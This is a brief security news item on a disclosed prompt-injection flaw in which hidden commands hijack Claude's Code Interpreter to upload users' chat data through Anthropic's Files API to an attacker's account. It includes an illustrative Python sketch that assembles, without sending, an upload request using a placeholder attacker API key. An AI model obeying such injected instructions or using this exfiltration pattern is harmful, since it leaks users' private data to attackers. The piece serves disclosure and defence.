A critical vulnerability in Anthropic's Claude AI lets attackers exfiltrate user data through a chained exploit that abuses the platform's own File API. A security researcher disclosed the flaw, which turns the AI's own tooling against its users.
Hidden commands embedded in content Claude processes can hijack its Code Interpreter, tricking the model into uploading sensitive data, such as chat histories, through Anthropic's own File API to an account the attacker controls.
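To make the chain concrete, here is a minimal sketch of the kind of upload request a hijacked Code Interpreter could be induced to assemble. This is an illustration, not the researcher's actual payload: the endpoint and headers follow Anthropic's public Files API documentation, the API key and stolen-text values are hypothetical placeholders, and the request is only built, never sent. The pivotal detail is that the injected instructions supply the attacker's API key, so the uploaded file lands in the attacker's account rather than the victim's.

```python
# Hypothetical attacker-supplied key smuggled in via prompt injection.
ATTACKER_API_KEY = "sk-ant-attacker-key"  # placeholder, not a real key

def build_exfil_request(stolen_text: str) -> dict:
    """Assemble (but do not send) a Files API upload request.

    Mirrors the shape of a POST to Anthropic's Files API; in the real
    exploit the sandboxed interpreter would be tricked into issuing it.
    """
    return {
        "url": "https://api.anthropic.com/v1/files",
        "headers": {
            "x-api-key": ATTACKER_API_KEY,  # attacker's key, not the victim's
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        # Multipart form field: the stolen conversation packaged as a file.
        "files": {"file": ("chat_history.txt", stolen_text)},
    }

request = build_exfil_request("...exfiltrated conversation data...")
print(request["url"])
```

Because the traffic goes to Anthropic's legitimate API domain, it blends in with normal platform activity, which is what makes this "living off the land" style of exfiltration hard to spot.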
Anthropic initially dismissed the report on October 25 but later acknowledged a "process hiccup" on October 30.